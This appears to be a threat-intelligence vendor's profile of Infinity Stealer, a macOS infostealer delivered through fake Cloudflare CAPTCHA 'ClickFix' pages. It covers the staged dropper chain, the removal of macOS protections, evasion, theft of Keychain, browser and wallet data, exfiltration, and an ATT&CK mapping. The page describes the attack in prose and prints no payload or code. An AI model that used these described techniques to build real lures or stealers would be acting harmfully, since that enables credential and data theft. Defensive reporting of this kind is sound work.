Skip to main content
Live Webinar with SANS (June 25)— Agentic CTI Automation for Fun & ProfitRegister Free
Mallory
Back to malware
Malware

Infinity Stealer

Infinity Stealer is a macOS-targeting infostealer delivered through ClickFix-style social engineering. Observed campaigns use fake Cloudflare CAPTCHA or verification pages to trick victims into opening Terminal and pasting a malicious, sometimes base64-obfuscated, curl command. That command launches a multi-stage infection chain: a Stage-1 Bash dropper downloads and decodes the next payload, removes macOS protections such as the quarantine flag, writes a Stage-2 loader to disk (including /tmp in reported cases), passes command-and-control information via environment variables, executes the loader, and deletes itself. The Stage-2 component is a native macOS loader compiled with Nuitka, which unpacks and runs the final Python 3.11 stealer payload, identified as UpdateHelper.bin or UpdateHelper[.]bin. Reported capabilities include theft of browser credentials, macOS Keychain entries, cryptocurrency wallet data, plaintext secrets such as .env files, and screenshots. The malware exfiltrates stolen data over HTTP or HTTP POST, performs anti-analysis checks for sandboxed or virtualized environments, introduces random delays to hinder analysis, and sends Telegram notifications to the operators after exfiltration. Malwarebytes described this as the first observed/documented macOS campaign combining ClickFix delivery with a Nuitka-compiled Python infostealer. The campaign has been linked in reporting to domains such as update-check[.]com, and the Stage-1 Bash template was noted as resembling code previously seen in macOS stealers such as MacSync/SHub, suggesting possible shared builder reuse.

Share:
For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

Start free trial
MITRE ATT&CK

Techniques & procedures

17 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

2 techniques
T1566PhishingEvidence1

These campaigns mimic the familiar “Verify You are a Human” tests commonly used by websites to distinguish legitimate users from bots.

T1566.002Spearphishing LinkEvidence1

The attack begins with a ClickFix lure on the domain update-check[.]com, posing as a human verification step from Cloudflare

Execution

2 techniques
T1059.004Unix ShellEvidence3

Victims are tricked into pasting a malicious curl command into the macOS Terminal, installing a Python-based infostealer compiled with Nuitka for enhanced evasion.

T1204User ExecutionEvidence3

Victims are prompted to press specific keyboard combinations, which ultimately result in the download and execution of malicious software on Microsoft Windows systems.

Stealth

5 techniques
T1027Obfuscated Files or InformationEvidence1

asking the user to complete the challenge by pasting a base64-obfuscated curl command into the macOS Terminal

T1036MasqueradingEvidence1

Infinity Stealer targets macOS via fake Cloudflare CAPTCHA... It spreads via ClickFix, tricking users with fake Cloudflare CAPTCHA pages.

T1070.004File DeletionEvidence2

The dropper decodes the payload, writes the Stage‑2 binary, removes macOS protections, executes it, passes C2 data, and then deletes itself.

T1497Virtualization/Sandbox EvasionEvidence2

It detects analysis environments and adds random delays to evade detection.

T1497.003Time Based ChecksEvidence1

It detects analysis environments and adds random delays to evade detection.

Credential Access

2 techniques
T1555Credentials from Password StoresEvidence3

Infinity Stealer can: Steal credentials from Chromium-based browsers and Firefox Extract macOS Keychain entries

T1649Steal or Forge Authentication CertificatesEvidence2

Infinity Stealer can: Steal credentials from Chromium-based browsers and Firefox Extract macOS Keychain entries

Discovery

2 techniques
T1497Virtualization/Sandbox EvasionEvidence2

It detects analysis environments and adds random delays to evade detection.

T1497.003Time Based ChecksEvidence1

It detects analysis environments and adds random delays to evade detection.

Collection

2 techniques
T1005Data from Local SystemEvidence2

The final payload, UpdateHelper[.]bin, is a Python 3.11 stealer that collects browser credentials, Keychain entries, crypto wallets, .env files, and screenshots

T1113Screen CaptureEvidence2

The final payload, UpdateHelper[.]bin, is a Python 3.11 stealer that collects browser credentials, Keychain entries, crypto wallets, .env files, and screenshots

Command and Control

1 technique
T1105Ingress Tool TransferEvidence2

The fake Cloudflare CAPTCHA tricks users into pasting a Terminal command that fetches a Stage-1 Bash dropper.

Exfiltration

2 techniques
T1041Exfiltration Over C2 ChannelEvidence1

All stolen data is exfiltrated via HTTP POST requests to the C2 server, with a Telegram alert sent to attackers upon completion.

T1048.003Exfiltration Over Unencrypted Non-C2 ProtocolEvidence2

The final payload, UpdateHelper[.]bin, is a Python 3.11 stealer that collects browser credentials, Keychain entries, crypto wallets, .env files, and screenshots, exfiltrating data via HTTP.

Other

1 technique
T1562Impair DefensesEvidence1

The dropper decodes the payload, writes the Stage‑2 binary, removes macOS protections, executes it, passes C2 data, and then deletes itself.

INDICATORS OF COMPROMISE

IOCs tracked for this family

1 indicator attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

View more in app
Network
1 tracked

IPs, domains, and DNS infrastructure linked to this family.

TypeValueLatest sighting
domain●●●●●●●●●●●●View more in app3 months ago
ACTIVITY FEED

Recent activity

4 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

4 SOURCESView more in app
security affairsNews
Mar 30, 2026
New macOS Infinity Stealer uses Nuitka Python payload and ClickFix

A macOS-focused infostealer delivered through fake Cloudflare CAPTCHA pages using ClickFix social engineering. It uses a Stage-1 Bash dropper and a Stage-2 native macOS loader compiled with Nuitka to unpack and run a Python 3.11 stealer that collects browser credentials, Keychain entries, crypto wallets, .env files, and screenshots, then exfiltrates the data via HTTP. It also includes anti-analysis checks, random delays for evasion, Telegram operator notification, and server-side credential cracking workflow.

Read more
bleeping computerNews
Mar 30, 2026
Apple adds macOS Terminal warning to block ClickFix attacks

A macOS stealer malware referenced as grabbing data via ClickFix lures.

Read more
bleeping computerNews
Mar 28, 2026
New Infinity Stealer malware grabs macOS data via ClickFix lures

A macOS-focused infostealer delivered via a ClickFix fake CAPTCHA lure. It uses a Python payload compiled with Nuitka into a native macOS binary, performs anti-analysis checks, takes screenshots, steals browser credentials, macOS Keychain entries, cryptocurrency wallets, and plaintext secrets in developer files, then exfiltrates the data over HTTP POST and notifies operators via Telegram.

Read more
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
Start free trial
IOC matching1

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping17

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.